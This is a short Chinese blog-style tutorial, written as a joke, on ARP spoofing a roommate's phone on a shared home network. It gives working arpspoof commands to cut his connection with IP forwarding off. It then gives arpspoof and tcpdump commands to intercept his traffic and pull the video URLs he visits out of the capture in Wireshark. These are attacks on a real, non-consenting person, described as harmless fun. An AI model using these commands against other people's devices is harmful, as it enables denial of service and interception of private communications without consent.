洋文:arp off network and arp spoof
tcpdump, arpspoof 一般linux下都会自带, wireshark 要用包管理器或者到官网下载.
假装局域网里面除了我还有两台机器
一台是网关, ip 192.168.0.1
一台是我室友的手机, ip 192.168.0.113
我室友晚上1点要开着扬声器看岛国片, 不太好意思当面打断他. 还好我们在一个局域网下面, 我可以直接用arpspoof断他的网~
arp断网很简单, 只要arpspoof目标和网关的时候把ip转发关掉就好了
$ echo 0 > /proc/sys/net/ipv4/ip_forward
$ arpspoof -i wlp8s0 -t 192.168.0.113 192.168.0.1
翻云覆雨的声音戛然而至了, 可喜可贺可喜可贺
有一天我晚上闲着没事躺在床上, 一不小心瞄到室友在手机上涉猎小电影, 其中一张封面女主长得是真不错. 但像我这样又帅又正值的人可绝对不能凑过去看啊, 不能丢了体面! 于是机智的我便拿出了arpspoof
$ echo 1 > /proc/sys/net/ipv4/ip_forward
$ arpspoof -i wlp8s0 -t 192.168.0.113 192.168.0.1
欺诈完了, 现在开始用tcpdump抓包
$ tcpdump -i wlp8s0 (tcp) and (host 192.168.0.113) -w a.cap
-i 指定网卡.因为是在arp协议下工作所以得有唯一的MAC地址 -i wlp8s0 代表用无线网网卡.
cap文件是wireshark用来分析网络包的文件格式, 参数-w a.cap会把抓到的包存为a.cap
tcp 和 host 192.168.0.113都是可选的参数, 用来规定抓包的规则. 规则可以用逻辑运算符连接,具体的意思猜也猜得出来吧. 具体还可以在host前面加上src 或者dst来规定是抓发送到host的包还是由host发出的包, 比如:
$ tcpdump -i wlp8s0 tcp and src host 192.168.0.113 -w xiaodianyin.cap
之后用wireshark打开a.cap, 寻找带有奇奇怪怪名字的tcp包, 用浏览器打开里面的网址, 然后开始不可描述的事情.
可喜可贺可喜可贺.